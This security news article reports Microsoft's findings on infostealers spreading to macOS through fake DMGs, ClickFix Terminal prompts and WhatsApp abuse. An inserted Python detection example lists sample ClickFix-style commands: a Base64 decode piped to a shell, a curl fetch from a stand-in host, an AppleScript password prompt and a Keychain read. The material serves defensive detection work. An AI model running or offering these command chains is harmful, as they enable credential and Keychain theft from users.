Microsoft: Info-Stealing malware expands from Windows to macOS


Pierluigi Paganini February 04, 2026

Microsoft warns info-stealing attacks are expanding from Windows to macOS, using cross-platform languages like Python and abusing trusted platforms.


Since late 2025, Microsoft has seen a surge in macOS infostealer attacks using social engineering, fake fixes, and malicious DMG files. Attackers deploy macOS-specific and Python-based stealers, abuse trusted apps like WhatsApp, and use native tools to steal credentials, crypto, and session data while evading defenses.

“Since late 2025, Microsoft Defender Experts has observed macOS-targeted infostealer campaigns using social engineering techniques—including ClickFix-style prompts and malicious DMG installers—to deploy macOS-specific infostealers such as DigitStealer, MacSync, and Atomic macOS Stealer (AMOS),” reads the report published by Microsoft.

“These campaigns leverage fileless execution, native macOS utilities, and AppleScript automation to harvest credentials, session data, secrets from browsers, keychains, and developer environments.”

Attackers are increasingly targeting Mac users and organizations with information-stealing malware using tricks that look legitimate and familiar.

Mac users are lured to fake websites, often via Google Ads, that push fake software or ask them to paste commands into Terminal. These scams install stealers like DigitStealer, MacSync, and Atomic Stealer, which quietly grab browser passwords, crypto wallets, and developer credentials, then erase traces. This can lead to account takeovers, financial theft, and access to company systems.

At the same time, phishing emails are spreading Python-based stealers because they’re easy to build and hard to detect. Malware like PXA Stealer steals logins, financial data, and browser sessions, often using Telegram and trusted tools to hide activity.

Attackers are also abusing trusted platforms like WhatsApp and PDF tools to spread malware, turning normal apps into delivery channels for credential and crypto theft.

In November 2025, Microsoft observed a WhatsApp abuse campaign that spread Eternidade Stealer through a multi-stage, worm-like infection chain. The attack starts with an obfuscated VB script that launches PowerShell to fetch payloads. A Python component hijacks WhatsApp accounts to message all contacts with malicious files, while a malicious MSI installs Eternidade Stealer to steal banking, payment, and cryptocurrency credentials.

In September 2025, Microsoft uncovered a fake “Crystal PDF” editor spread via Google Ads and SEO poisoning. Once installed, it persists via scheduled tasks and steals browser cookies, sessions, and credentials from Chrome and Firefox.

Microsoft recommends a layered defense to stop macOS, Python-based, and platform-abuse infostealers. Train users to spot fake ads, bogus installers, and ClickFix copy-paste tricks, and avoid unsigned DMGs or “terminal fixes.” Monitor macOS for risky Terminal activity like curl, Base64 decoding, AppleScript, and fileless execution chains. Watch for unusual access to Keychain, browser credentials, cloud keys, and crypto wallets.

Inspect outbound traffic for POST requests to new or suspicious domains and for short-lived ZIP files created in temp folders before data exfiltration. Block known command-and-control servers using threat intelligence. Strengthen defenses against Python and LOLBIN abuse, including certutil misuse, AutoIt activity, and process hollowing.

Enable cloud-delivered protection, EDR in block mode, network and web protection, SmartScreen, automated investigation, and tamper protection. Apply attack surface reduction rules to block obfuscated scripts, untrusted executables, and scripts launching downloaded payloads.
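As an added illustration of the monitoring guidance above (example code, not from the article or from Microsoft's report), the following correlates constructed macOS process telemetry by process tree and scores the signals the article names: a Terminal-spawned shell, Base64 decoding piped into a shell, curl fetches, an AppleScript password prompt, and Keychain reads. The event fields, rule weights and alert threshold are assumptions to be mapped onto a real EDR schema.

```python
import re

# Constructed sample telemetry modelled on a ClickFix-style chain (user pastes a
# command into Terminal; it decodes and runs a fetched script, prompts for a
# password via AppleScript, then reads the Keychain). Hostnames are .invalid.
SAMPLE_EVENTS = [
    {"pid": 501, "ppid": 400, "parent": "Terminal", "image": "/bin/zsh",
     "cmdline": "echo aHR0cDovL2V4YW1wbGUuaW52YWxpZA== | base64 -d | sh"},
    {"pid": 502, "ppid": 501, "parent": "zsh", "image": "/usr/bin/curl",
     "cmdline": "curl -fsSL http://update.example.invalid/fix.sh"},
    {"pid": 503, "ppid": 501, "parent": "zsh", "image": "/usr/bin/osascript",
     "cmdline": "osascript -e 'display dialog \"Enter password\" with hidden answer'"},
    {"pid": 504, "ppid": 501, "parent": "zsh", "image": "/usr/bin/security",
     "cmdline": "security find-generic-password -ga 'Chrome Safe Storage'"},
    # Benign-looking unrelated tree: a lone curl download, no other signals.
    {"pid": 601, "ppid": 1, "parent": "launchd", "image": "/usr/bin/curl",
     "cmdline": "curl -s https://pkg.example.invalid/tool.tar.gz -o /tmp/tool.tar.gz"},
]

# (rule name, weight, predicate over one event). Weights are illustrative only.
RULES = [
    ("terminal_spawned_shell", 2, lambda e: e["parent"] == "Terminal"
        and e["image"].endswith(("/sh", "/zsh", "/bash"))),
    ("base64_decode_to_shell", 4, lambda e: re.search(
        r"base64\s+(-d|--decode|-D)\b.*\|\s*(sh|zsh|bash)\b", e["cmdline"]) is not None),
    ("curl_fetch", 1, lambda e: e["image"].endswith("/curl")),
    ("applescript_password_prompt", 4, lambda e: e["image"].endswith("/osascript")
        and "hidden answer" in e["cmdline"]),
    ("keychain_read", 3, lambda e: e["image"].endswith("/security")
        and "find-generic-password" in e["cmdline"]),
]

def root_pid(event, by_pid):
    """Walk ppid links within the batch to the oldest ancestor we have."""
    pid, seen = event["pid"], set()
    while pid not in seen and by_pid[pid]["ppid"] in by_pid:
        seen.add(pid)
        pid = by_pid[pid]["ppid"]
    return pid

def correlate(events, threshold=6):
    """Sum rule weights per process tree; alert when a tree crosses threshold."""
    by_pid = {e["pid"]: e for e in events}
    trees = {}
    for e in events:
        entry = trees.setdefault(root_pid(e, by_pid), [0, []])
        for name, weight, pred in RULES:
            if pred(e):
                entry[0] += weight
                entry[1].append(name)
    return {r: {"score": s, "rules": h, "alert": s >= threshold} for r, (s, h) in trees.items()}

if __name__ == "__main__":
    for root, verdict in correlate(SAMPLE_EVENTS).items():
        print(root, verdict)
```

Scoring per tree rather than per event is what separates the pasted-command chain (root 501) from the single unrelated curl (root 601), which would otherwise look identical at the event level.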

“Due to the growing threat of Python-based infostealers, it is important that organizations protect their environment by being aware of the tactics, techniques, and procedures used by the threat actors who deploy this type of malware,” Microsoft concludes. “Being compromised by infostealers can lead to data breaches, unauthorized access to internal systems, business email compromise (BEC), supply chain attacks, and ransomware attacks.”

Source: https://securityaffairs.com/187608/security/microsoft-info-stealing-malware-expands-from-windows-to-macos.html